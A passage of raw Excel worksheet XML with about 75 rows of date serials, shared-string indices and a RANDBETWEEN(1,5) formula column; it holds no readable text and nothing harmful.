        <v>3</v>
      </c>
    </row>
    <row r="14562" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14562" s="1">
        <v>43238.454062500001</v>
      </c>
      <c r="C14562" t="s">
        <v>10295</v>
      </c>
      <c r="D14562" t="s">
        <v>36</v>
      </c>
      <c r="E14562" t="s">
        <v>13088</v>
      </c>
      <c r="F14562">
        <f t="shared" ca="1" si="227"/>
        <v>3</v>
      </c>
    </row>
    <row r="14563" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A14563" s="1">
        <v>43238.44699074074</v>
      </c>
      <c r="C14563" t="s">
        <v>10</v>
      </c>
      <c r="D14563" t="s">
        <v>374</v>
      </c>
      <c r="E14563" s="2" t="s">
        <v>13089</v>
      </c>
      <c r="F14563">
        <f t="shared" ca="1" si="227"/>
        <v>2</v>
      </c>
    </row>
    <row r="14564" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14564" s="1">
        <v>43238.436111111114</v>
      </c>
      <c r="C14564" t="s">
        <v>10</v>
      </c>
      <c r="D14564" t="s">
        <v>163</v>
      </c>
      <c r="E14564" t="s">
        <v>13090</v>
      </c>
      <c r="F14564">
        <f t="shared" ca="1" si="227"/>
        <v>2</v>
      </c>
    </row>
    <row r="14565" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14565" s="1">
        <v>43238.413877314815</v>
      </c>
      <c r="C14565" t="s">
        <v>6</v>
      </c>
      <c r="D14565" t="s">
        <v>36</v>
      </c>
      <c r="E14565" t="s">
        <v>13091</v>
      </c>
      <c r="F14565">
        <f t="shared" ca="1" si="227"/>
        <v>3</v>
      </c>
    </row>
    <row r="14566" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14566" s="1">
        <v>43238.405694444446</v>
      </c>
      <c r="C14566" t="s">
        <v>10088</v>
      </c>
      <c r="D14566" t="s">
        <v>36</v>
      </c>
      <c r="E14566" t="s">
        <v>13092</v>
      </c>
      <c r="F14566">
        <f t="shared" ca="1" si="227"/>
        <v>3</v>
      </c>
    </row>
    <row r="14567" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14567" s="1">
        <v>43238.321956018517</v>
      </c>
      <c r="C14567" t="s">
        <v>60</v>
      </c>
      <c r="E14567" t="s">
        <v>13093</v>
      </c>
      <c r="F14567">
        <f t="shared" ca="1" si="227"/>
        <v>2</v>
      </c>
    </row>
    <row r="14568" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14568" s="1">
        <v>43238.293402777781</v>
      </c>
      <c r="C14568" t="s">
        <v>41</v>
      </c>
      <c r="F14568">
        <f t="shared" ca="1" si="227"/>
        <v>1</v>
      </c>
    </row>
    <row r="14569" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A14569" s="1">
        <v>43238.264143518521</v>
      </c>
      <c r="C14569" t="s">
        <v>107</v>
      </c>
      <c r="D14569" t="s">
        <v>7</v>
      </c>
      <c r="E14569" s="2" t="s">
        <v>13094</v>
      </c>
      <c r="F14569">
        <f t="shared" ca="1" si="227"/>
        <v>4</v>
      </c>
    </row>
    <row r="14570" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14570" s="1">
        <v>43238.250671296293</v>
      </c>
      <c r="C14570" t="s">
        <v>41</v>
      </c>
      <c r="E14570" t="s">
        <v>13095</v>
      </c>
      <c r="F14570">
        <f t="shared" ca="1" si="227"/>
        <v>5</v>
      </c>
    </row>
    <row r="14571" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14571" s="1">
        <v>43238.24113425926</v>
      </c>
      <c r="C14571" t="s">
        <v>48</v>
      </c>
      <c r="E14571" s="2" t="s">
        <v>13096</v>
      </c>
      <c r="F14571">
        <f t="shared" ca="1" si="227"/>
        <v>2</v>
      </c>
    </row>
    <row r="14572" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14572" s="1">
        <v>43238.239687499998</v>
      </c>
      <c r="C14572" t="s">
        <v>454</v>
      </c>
      <c r="E14572" s="2" t="s">
        <v>13097</v>
      </c>
      <c r="F14572">
        <f t="shared" ca="1" si="227"/>
        <v>5</v>
      </c>
    </row>
    <row r="14573" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14573" s="1">
        <v>43238.228032407409</v>
      </c>
      <c r="C14573" t="s">
        <v>1812</v>
      </c>
      <c r="D14573" t="s">
        <v>36</v>
      </c>
      <c r="E14573" t="s">
        <v>13098</v>
      </c>
      <c r="F14573">
        <f t="shared" ca="1" si="227"/>
        <v>4</v>
      </c>
    </row>
    <row r="14574" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A14574" s="1">
        <v>43238.217939814815</v>
      </c>
      <c r="C14574" t="s">
        <v>118</v>
      </c>
      <c r="D14574" t="s">
        <v>993</v>
      </c>
      <c r="E14574" s="2" t="s">
        <v>13099</v>
      </c>
      <c r="F14574">
        <f t="shared" ca="1" si="227"/>
        <v>4</v>
      </c>
    </row>
    <row r="14575" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A14575" s="1">
        <v>43238.19939814815</v>
      </c>
      <c r="C14575" t="s">
        <v>139</v>
      </c>
      <c r="E14575" s="2" t="s">
        <v>13100</v>
      </c>
      <c r="F14575">
        <f t="shared" ca="1" si="227"/>
        <v>5</v>
      </c>
    </row>
    <row r="14576" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14576" s="1">
        <v>43238.17591435185</v>
      </c>
      <c r="C14576" t="s">
        <v>335</v>
      </c>
      <c r="D14576" t="s">
        <v>36</v>
      </c>
      <c r="E14576" t="s">
        <v>13101</v>
      </c>
      <c r="F14576">
        <f t="shared" ca="1" si="227"/>
        <v>5</v>
      </c>
    </row>
    <row r="14577" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14577" s="1">
        <v>43238.166030092594</v>
      </c>
      <c r="C14577" t="s">
        <v>2140</v>
      </c>
      <c r="D14577" t="s">
        <v>36</v>
      </c>
      <c r="E14577" t="s">
        <v>13102</v>
      </c>
      <c r="F14577">
        <f t="shared" ca="1" si="227"/>
        <v>1</v>
      </c>
    </row>
    <row r="14578" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14578" s="1">
        <v>43238.150057870371</v>
      </c>
      <c r="C14578" t="s">
        <v>253</v>
      </c>
      <c r="E14578" s="2" t="s">
        <v>13103</v>
      </c>
      <c r="F14578">
        <f t="shared" ca="1" si="227"/>
        <v>3</v>
      </c>
    </row>
    <row r="14579" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14579" s="1">
        <v>43238.115879629629</v>
      </c>
      <c r="C14579" t="s">
        <v>103</v>
      </c>
      <c r="E14579" t="s">
        <v>13104</v>
      </c>
      <c r="F14579">
        <f t="shared" ca="1" si="227"/>
        <v>2</v>
      </c>
    </row>
    <row r="14580" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14580" s="1">
        <v>43238.028749999998</v>
      </c>
      <c r="C14580" t="s">
        <v>570</v>
      </c>
      <c r="D14580" t="s">
        <v>36</v>
      </c>
      <c r="E14580" t="s">
        <v>13105</v>
      </c>
      <c r="F14580">
        <f t="shared" ca="1" si="227"/>
        <v>2</v>
      </c>
    </row>
    <row r="14581" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14581" s="1">
        <v>43237.969502314816</v>
      </c>
      <c r="C14581" t="s">
        <v>1130</v>
      </c>
      <c r="D14581" t="s">
        <v>36</v>
      </c>
      <c r="E14581" t="s">
        <v>13106</v>
      </c>
      <c r="F14581">
        <f t="shared" ca="1" si="227"/>
        <v>1</v>
      </c>
    </row>
    <row r="14582" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14582" s="1">
        <v>43237.956226851849</v>
      </c>
      <c r="C14582" t="s">
        <v>2140</v>
      </c>
      <c r="D14582" t="s">
        <v>36</v>
      </c>
      <c r="E14582" t="s">
        <v>13107</v>
      </c>
      <c r="F14582">
        <f t="shared" ca="1" si="227"/>
        <v>4</v>
      </c>
    </row>
    <row r="14583" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14583" s="1">
        <v>43237.954629629632</v>
      </c>
      <c r="C14583" t="s">
        <v>731</v>
      </c>
      <c r="D14583" t="s">
        <v>36</v>
      </c>
      <c r="E14583" t="s">
        <v>13108</v>
      </c>
      <c r="F14583">
        <f t="shared" ca="1" si="227"/>
        <v>1</v>
      </c>
    </row>
    <row r="14584" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14584" s="1">
        <v>43237.954467592594</v>
      </c>
      <c r="C14584" t="s">
        <v>7491</v>
      </c>
      <c r="D14584" t="s">
        <v>1036</v>
      </c>
      <c r="E14584" s="2" t="s">
        <v>13109</v>
      </c>
      <c r="F14584">
        <f t="shared" ca="1" si="227"/>
        <v>5</v>
      </c>
    </row>
    <row r="14585" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14585" s="1">
        <v>43237.920474537037</v>
      </c>
      <c r="C14585" t="s">
        <v>97</v>
      </c>
      <c r="D14585" t="s">
        <v>1056</v>
      </c>
      <c r="E14585" s="2" t="s">
        <v>13110</v>
      </c>
      <c r="F14585">
        <f t="shared" ca="1" si="227"/>
        <v>2</v>
      </c>
    </row>
    <row r="14586" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14586" s="1">
        <v>43237.812280092592</v>
      </c>
      <c r="C14586" t="s">
        <v>776</v>
      </c>
      <c r="D14586" t="s">
        <v>36</v>
      </c>
      <c r="E14586" t="s">
        <v>13111</v>
      </c>
      <c r="F14586">
        <f t="shared" ca="1" si="227"/>
        <v>2</v>
      </c>
    </row>
    <row r="14587" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A14587" s="1">
        <v>43237.761296296296</v>
      </c>
      <c r="C14587" t="s">
        <v>2210</v>
      </c>
      <c r="D14587" t="s">
        <v>46</v>
      </c>
      <c r="E14587" s="2" t="s">
        <v>13112</v>
      </c>
      <c r="F14587">
        <f t="shared" ca="1" si="227"/>
        <v>4</v>
      </c>
    </row>
    <row r="14588" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14588" s="1">
        <v>43237.746354166666</v>
      </c>
      <c r="C14588" t="s">
        <v>258</v>
      </c>
      <c r="D14588" t="s">
        <v>36</v>
      </c>
      <c r="E14588" t="s">
        <v>13113</v>
      </c>
      <c r="F14588">
        <f t="shared" ca="1" si="227"/>
        <v>3</v>
      </c>
    </row>
    <row r="14589" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14589" s="1">
        <v>43237.738171296296</v>
      </c>
      <c r="C14589" t="s">
        <v>10</v>
      </c>
      <c r="D14589" t="s">
        <v>36</v>
      </c>
      <c r="E14589" t="s">
        <v>13114</v>
      </c>
      <c r="F14589">
        <f t="shared" ca="1" si="227"/>
        <v>1</v>
      </c>
    </row>
    <row r="14590" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14590" s="1">
        <v>43237.725057870368</v>
      </c>
      <c r="C14590" t="s">
        <v>9957</v>
      </c>
      <c r="D14590" t="s">
        <v>36</v>
      </c>
      <c r="E14590" t="s">
        <v>13115</v>
      </c>
      <c r="F14590">
        <f t="shared" ca="1" si="227"/>
        <v>5</v>
      </c>
    </row>
    <row r="14591" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14591" s="1">
        <v>43237.717002314814</v>
      </c>
      <c r="C14591" t="s">
        <v>103</v>
      </c>
      <c r="D14591" t="s">
        <v>36</v>
      </c>
      <c r="E14591" t="s">
        <v>13116</v>
      </c>
      <c r="F14591">
        <f t="shared" ca="1" si="227"/>
        <v>4</v>
      </c>
    </row>
    <row r="14592" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14592" s="1">
        <v>43237.713275462964</v>
      </c>
      <c r="C14592" t="s">
        <v>461</v>
      </c>
      <c r="D14592" t="s">
        <v>750</v>
      </c>
      <c r="E14592" s="2" t="s">
        <v>13117</v>
      </c>
      <c r="F14592">
        <f t="shared" ca="1" si="227"/>
        <v>4</v>
      </c>
    </row>
    <row r="14593" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14593" s="1">
        <v>43237.712199074071</v>
      </c>
      <c r="C14593" t="s">
        <v>10</v>
      </c>
      <c r="D14593" t="s">
        <v>89</v>
      </c>
      <c r="E14593" t="s">
        <v>13118</v>
      </c>
      <c r="F14593">
        <f t="shared" ca="1" si="227"/>
        <v>1</v>
      </c>
    </row>
    <row r="14594" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14594" s="1">
        <v>43237.7112037037</v>
      </c>
      <c r="C14594" t="s">
        <v>10</v>
      </c>
      <c r="D14594" t="s">
        <v>20</v>
      </c>
      <c r="E14594" s="2" t="s">
        <v>13119</v>
      </c>
      <c r="F14594">
        <f t="shared" ref="F14594:F14657" ca="1" si="228">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="14595" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14595" s="1">
        <v>43237.693055555559</v>
      </c>
      <c r="C14595" t="s">
        <v>10</v>
      </c>
      <c r="D14595" t="s">
        <v>80</v>
      </c>
      <c r="E14595" s="2" t="s">
        <v>13120</v>
      </c>
      <c r="F14595">
        <f t="shared" ca="1" si="228"/>
        <v>4</v>
      </c>
    </row>
    <row r="14596" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14596" s="1">
        <v>43237.680960648147</v>
      </c>
      <c r="C14596" t="s">
        <v>10</v>
      </c>
      <c r="D14596" t="s">
        <v>163</v>
      </c>
      <c r="E14596" t="s">
        <v>13121</v>
      </c>
      <c r="F14596">
        <f t="shared" ca="1" si="228"/>
        <v>2</v>
      </c>
    </row>
    <row r="14597" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14597" s="1">
        <v>43237.680300925924</v>
      </c>
      <c r="C14597" t="s">
        <v>10</v>
      </c>
      <c r="D14597" t="s">
        <v>1036</v>
      </c>
      <c r="E14597" s="2" t="s">
        <v>13122</v>
      </c>
      <c r="F14597">
        <f t="shared" ca="1" si="228"/>
        <v>2</v>
      </c>
    </row>
    <row r="14598" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A14598" s="1">
        <v>43237.655543981484</v>
      </c>
      <c r="C14598" t="s">
        <v>10</v>
      </c>
      <c r="D14598" t="s">
        <v>20</v>
      </c>
      <c r="E14598" s="2" t="s">
        <v>13123</v>
      </c>
      <c r="F14598">
        <f t="shared" ca="1" si="228"/>
        <v>2</v>
      </c>
    </row>
    <row r="14599" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A14599" s="1">
        <v>43237.626782407409</v>
      </c>
      <c r="C14599" t="s">
        <v>836</v>
      </c>
      <c r="E14599" s="2" t="s">
        <v>13124</v>
      </c>
      <c r="F14599">
        <f t="shared" ca="1" si="228"/>
        <v>1</v>
      </c>
    </row>
    <row r="14600" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14600" s="1">
        <v>43237.623518518521</v>
      </c>
      <c r="C14600" t="s">
        <v>6</v>
      </c>
      <c r="D14600" t="s">
        <v>821</v>
      </c>
      <c r="E14600" s="2" t="s">
        <v>13125</v>
      </c>
      <c r="F14600">
        <f t="shared" ca="1" si="228"/>
        <v>2</v>
      </c>
    </row>
    <row r="14601" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14601" s="1">
        <v>43237.621122685188</v>
      </c>
      <c r="C14601" t="s">
        <v>10</v>
      </c>
      <c r="D14601" t="s">
        <v>192</v>
      </c>
      <c r="E14601" t="s">
        <v>13126</v>
      </c>
      <c r="F14601">
        <f t="shared" ca="1" si="228"/>
        <v>4</v>
      </c>
    </row>
    <row r="14602" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A14602" s="1">
        <v>43237.609375</v>
      </c>
      <c r="C14602" t="s">
        <v>10</v>
      </c>
      <c r="D14602" t="s">
        <v>20</v>
      </c>
      <c r="E14602" s="2" t="s">
        <v>13127</v>
      </c>
      <c r="F14602">
        <f t="shared" ca="1" si="228"/>
        <v>1</v>
      </c>
    </row>
    <row r="14603" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14603" s="1">
        <v>43237.598981481482</v>
      </c>
      <c r="C14603" t="s">
        <v>6</v>
      </c>
      <c r="D14603" t="s">
        <v>821</v>
      </c>
      <c r="E14603" t="s">
        <v>13128</v>
      </c>
      <c r="F14603">
        <f t="shared" ca="1" si="228"/>
        <v>1</v>
      </c>
    </row>
    <row r="14604" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14604" s="1">
        <v>43237.585312499999</v>
      </c>
      <c r="C14604" t="s">
        <v>97</v>
      </c>
      <c r="D14604" t="s">
        <v>632</v>
      </c>
      <c r="E14604" s="2" t="s">
        <v>13129</v>
      </c>
      <c r="F14604">
        <f t="shared" ca="1" si="228"/>
        <v>1</v>
      </c>
    </row>
    <row r="14605" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14605" s="1">
        <v>43237.581446759257</v>
      </c>
      <c r="C14605" t="s">
        <v>43</v>
      </c>
      <c r="D14605" t="s">
        <v>36</v>
      </c>
      <c r="E14605" t="s">
        <v>13130</v>
      </c>
      <c r="F14605">
        <f t="shared" ca="1" si="228"/>
        <v>5</v>
      </c>
    </row>
    <row r="14606" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14606" s="1">
        <v>43237.576874999999</v>
      </c>
      <c r="C14606" t="s">
        <v>10</v>
      </c>
      <c r="D14606" t="s">
        <v>14</v>
      </c>
      <c r="E14606" t="s">
        <v>13131</v>
      </c>
      <c r="F14606">
        <f t="shared" ca="1" si="228"/>
        <v>5</v>
      </c>
    </row>
    <row r="14607" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14607" s="1">
        <v>43237.568391203706</v>
      </c>
      <c r="C14607" t="s">
        <v>10</v>
      </c>
      <c r="D14607" t="s">
        <v>80</v>
      </c>
      <c r="E14607" t="s">
        <v>13132</v>
      </c>
      <c r="F14607">
        <f t="shared" ca="1" si="228"/>
        <v>2</v>
      </c>
    </row>
    <row r="14608" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14608" s="1">
        <v>43237.564733796295</v>
      </c>
      <c r="C14608" t="s">
        <v>29</v>
      </c>
      <c r="E14608" t="s">
        <v>13133</v>
      </c>
      <c r="F14608">
        <f t="shared" ca="1" si="228"/>
        <v>4</v>
      </c>
    </row>
    <row r="14609" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14609" s="1">
        <v>43237.547060185185</v>
      </c>
      <c r="C14609" t="s">
        <v>48</v>
      </c>
      <c r="E14609" s="2" t="s">
        <v>13134</v>
      </c>
      <c r="F14609">
        <f t="shared" ca="1" si="228"/>
        <v>1</v>
      </c>
    </row>
    <row r="14610" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14610" s="1">
        <v>43237.546585648146</v>
      </c>
      <c r="C14610" t="s">
        <v>6</v>
      </c>
      <c r="D14610" t="s">
        <v>25</v>
      </c>
      <c r="E14610" t="s">
        <v>13135</v>
      </c>
      <c r="F14610">
        <f t="shared" ca="1" si="228"/>
        <v>1</v>
      </c>
    </row>
    <row r="14611" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14611" s="1">
        <v>43237.534212962964</v>
      </c>
      <c r="C14611" t="s">
        <v>2545</v>
      </c>
      <c r="D14611" t="s">
        <v>667</v>
      </c>
      <c r="E14611" t="s">
        <v>13041</v>
      </c>
      <c r="F14611">
        <f t="shared" ca="1" si="228"/>
        <v>1</v>
      </c>
    </row>
    <row r="14612" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14612" s="1">
        <v>43237.523310185185</v>
      </c>
      <c r="C14612" t="s">
        <v>10</v>
      </c>
      <c r="D14612" t="s">
        <v>36</v>
      </c>
      <c r="E14612" t="s">
        <v>13136</v>
      </c>
      <c r="F14612">
        <f t="shared" ca="1" si="228"/>
        <v>2</v>
      </c>
    </row>
    <row r="14613" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14613" s="1">
        <v>43237.506261574075</v>
      </c>
      <c r="C14613" t="s">
        <v>2108</v>
      </c>
      <c r="D14613" t="s">
        <v>36</v>
      </c>
      <c r="E14613" t="s">
        <v>13137</v>
      </c>
      <c r="F14613">
        <f t="shared" ca="1" si="228"/>
        <v>3</v>
      </c>
    </row>
    <row r="14614" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14614" s="1">
        <v>43237.493356481478</v>
      </c>
      <c r="C14614" t="s">
        <v>10</v>
      </c>
      <c r="D14614" t="s">
        <v>6</v>
      </c>
      <c r="E14614" t="s">
        <v>13138</v>
      </c>
      <c r="F14614">
        <f t="shared" ca="1" si="228"/>
        <v>4</v>
      </c>
    </row>
    <row r="14615" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14615" s="1">
        <v>43237.470752314817</v>
      </c>
      <c r="C14615" t="s">
        <v>292</v>
      </c>
      <c r="D14615" t="s">
        <v>36</v>
      </c>
      <c r="E14615" t="s">
        <v>13139</v>
      </c>
      <c r="F14615">
        <f t="shared" ca="1" si="228"/>
        <v>1</v>
      </c>
    </row>
    <row r="14616" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14616" s="1">
        <v>43237.459328703706</v>
      </c>
      <c r="C14616" t="s">
        <v>10</v>
      </c>
      <c r="D14616" t="s">
        <v>92</v>
      </c>
      <c r="E14616" s="2" t="s">
        <v>13140</v>
      </c>
      <c r="F14616">
        <f t="shared" ca="1" si="228"/>
        <v>1</v>
      </c>
    </row>
    <row r="14617" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14617" s="1">
        <v>43237.454050925924</v>
      </c>
      <c r="C14617" t="s">
        <v>5020</v>
      </c>
      <c r="D14617" t="s">
        <v>36</v>
      </c>
      <c r="E14617" t="s">
        <v>13141</v>
      </c>
      <c r="F14617">
        <f t="shared" ca="1" si="228"/>
        <v>2</v>
      </c>
    </row>
    <row r="14618" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14618" s="1">
        <v>43237.445405092592</v>
      </c>
      <c r="C14618" t="s">
        <v>10</v>
      </c>
      <c r="D14618" t="s">
        <v>192</v>
      </c>
      <c r="E14618" s="2" t="s">
        <v>13142</v>
      </c>
      <c r="F14618">
        <f t="shared" ca="1" si="228"/>
        <v>5</v>
      </c>
    </row>
    <row r="14619" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14619" s="1">
        <v>43237.431215277778</v>
      </c>
      <c r="C14619" t="s">
        <v>6</v>
      </c>
      <c r="D14619" t="s">
        <v>25</v>
      </c>
      <c r="E14619" s="2" t="s">
        <v>13143</v>
      </c>
      <c r="F14619">
        <f t="shared" ca="1" si="228"/>
        <v>4</v>
      </c>
    </row>
    <row r="14620" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14620" s="1">
        <v>43237.404444444444</v>
      </c>
      <c r="C14620" t="s">
        <v>71</v>
      </c>
      <c r="E14620" t="s">
        <v>13144</v>
      </c>
      <c r="F14620">
        <f t="shared" ca="1" si="228"/>
        <v>3</v>
      </c>
    </row>
    <row r="14621" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14621" s="1">
        <v>43237.403877314813</v>
      </c>
      <c r="C14621" t="s">
        <v>6</v>
      </c>
      <c r="D14621" t="s">
        <v>25</v>
      </c>
      <c r="E14621" t="s">
        <v>13145</v>
      </c>
      <c r="F14621">
        <f t="shared" ca="1" si="228"/>
        <v>3</v>
      </c>
    </row>
    <row r="14622" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14622" s="1">
        <v>43237.395358796297</v>
      </c>
      <c r="C14622" t="s">
        <v>10</v>
      </c>
      <c r="D14622" t="s">
        <v>263</v>
      </c>
      <c r="E14622" t="s">
        <v>13146</v>
      </c>
      <c r="F14622">
        <f t="shared" ca="1" si="228"/>
        <v>4</v>
      </c>
    </row>
    <row r="14623" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14623" s="1">
        <v>43237.394594907404</v>
      </c>
      <c r="C14623" t="s">
        <v>10</v>
      </c>
      <c r="D14623" t="s">
        <v>39</v>
      </c>
      <c r="E14623" t="s">
        <v>13147</v>
      </c>
      <c r="F14623">
        <f t="shared" ca="1" si="228"/>
        <v>5</v>
      </c>
    </row>
    <row r="14624" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14624" s="1">
        <v>43237.391377314816</v>
      </c>
      <c r="C14624" t="s">
        <v>10</v>
      </c>
      <c r="D14624" t="s">
        <v>36</v>
      </c>
      <c r="E14624" t="s">
        <v>13148</v>
      </c>
      <c r="F14624">
        <f t="shared" ca="1" si="228"/>
        <v>2</v>
      </c>
    </row>
    <row r="14625" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14625" s="1">
        <v>43237.36818287037</v>
      </c>
      <c r="C14625" t="s">
        <v>1408</v>
      </c>
      <c r="E14625" t="s">
        <v>13149</v>
      </c>
      <c r="F14625">
        <f t="shared" ca="1" si="228"/>
        <v>3</v>
      </c>
    </row>
    <row r="14626" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14626" s="1">
        <v>43237.367210648146</v>
      </c>
      <c r="C14626" t="s">
        <v>71</v>
      </c>
      <c r="D14626" t="s">
        <v>312</v>
      </c>
      <c r="E14626" s="2" t="s">
        <v>13150</v>
      </c>
      <c r="F14626">
        <f t="shared" ca="1" si="228"/>
        <v>4</v>
      </c>
    </row>
    <row r="14627" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14627" s="1">
        <v>43237.360636574071</v>
      </c>
      <c r="C14627" t="s">
        <v>2552</v>
      </c>
      <c r="E14627" t="s">
        <v>13151</v>
      </c>
      <c r="F14627">
        <f t="shared" ca="1" si="228"/>
        <v>1</v>
      </c>
    </row>
    <row r="14628" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14628" s="1">
        <v>43237.353171296294</v>
      </c>
      <c r="C14628" t="s">
        <v>14</v>
      </c>
      <c r="E14628" s="2" t="s">
        <v>13152</v>
      </c>
      <c r="F14628">
        <f t="shared" ca="1" si="228"/>
        <v>3</v>
      </c>
    </row>
    <row r="14629" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14629" s="1">
        <v>43237.29446759259</v>
      </c>
      <c r="C14629" t="s">
        <v>454</v>
      </c>
      <c r="D14629" t="s">
        <v>92</v>
      </c>
      <c r="E14629" s="2" t="s">
        <v>13153</v>
      </c>
      <c r="F14629">
        <f t="shared" ca="1" si="228"/>
        <v>1</v>
      </c>
    </row>
    <row r="14630" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14630" s="1">
        <v>43237.294456018521</v>
      </c>
      <c r="C14630" t="s">
        <v>454</v>
      </c>
      <c r="D14630" t="s">
        <v>107</v>
      </c>
      <c r="E14630" s="2" t="s">
        <v>13154</v>
      </c>
      <c r="F14630">
        <f t="shared" ca="1" si="228"/>
        <v>1</v>
      </c>
    </row>
    <row r="14631" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14631" s="1">
        <v>43237.294398148151</v>
      </c>
      <c r="C14631" t="s">
        <v>454</v>
      </c>
      <c r="D14631" t="s">
        <v>721</v>
      </c>
      <c r="E14631" s="2" t="s">
        <v>13155</v>
      </c>
      <c r="F14631">
        <f t="shared" ca="1" si="228"/>
        <v>4</v>
      </c>
    </row>
    <row r="14632" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14632" s="1">
        <v>43237.287129629629</v>
      </c>
      <c r="C14632" t="s">
        <v>189</v>
      </c>
      <c r="E14632" s="2" t="s">
        <v>13156</v>
      </c>
      <c r="F14632">
        <f t="shared" ca="1" si="228"/>
        <v>3</v>
      </c>
    </row>
    <row r="14633" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14633" s="1">
        <v>43237.272731481484</v>
      </c>
      <c r="C14633" t="s">
        <v>102</v>
      </c>
      <c r="D14633" t="s">
        <v>36</v>
      </c>
      <c r="E14633" t="s">
        <v>13157</v>
      </c>
      <c r="F14633">
        <f t="shared" ca="1" si="228"/>
        <v>3</v>
      </c>
    </row>
    <row r="14634" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14634" s="1">
        <v>43237.272245370368</v>
      </c>
      <c r="C14634" t="s">
        <v>6829</v>
      </c>
      <c r="E14634" t="s">
        <v>13158</v>
      </c>
      <c r="F14634">
        <f t="shared" ca="1" si="228"/>
        <v>3</v>
      </c>
    </row>
    <row r="14635" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14635" s="1">
        <v>43237.271516203706</v>
      </c>
      <c r="C14635" t="s">
        <v>41</v>
      </c>
      <c r="E14635" t="s">
        <v>13159</v>
      </c>
      <c r="F14635">
        <f t="shared" ca="1" si="228"/>
        <v>1</v>
      </c>
    </row>
    <row r="14636" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14636" s="1">
        <v>43237.264861111114</v>
      </c>
      <c r="C14636" t="s">
        <v>2552</v>
      </c>
      <c r="E14636" t="s">
        <v>13160</v>
      </c>
      <c r="F14636">
        <f t="shared" ca="1" si="228"/>
        <v>1</v>
      </c>
    </row>
    <row r="14637" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14637" s="1">
        <v>43237.260462962964</v>
      </c>
      <c r="C14637" t="s">
        <v>71</v>
      </c>
      <c r="E14637" t="s">
        <v>13161</v>
      </c>
      <c r="F14637">
        <f t="shared" ca="1" si="228"/>
        <v>2</v>
      </c>
    </row>
    <row r="14638" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14638" s="1">
        <v>43237.224976851852</v>
      </c>
      <c r="C14638" t="s">
        <v>41</v>
      </c>
      <c r="E14638" t="s">
        <v>13162</v>
      </c>
      <c r="F14638">
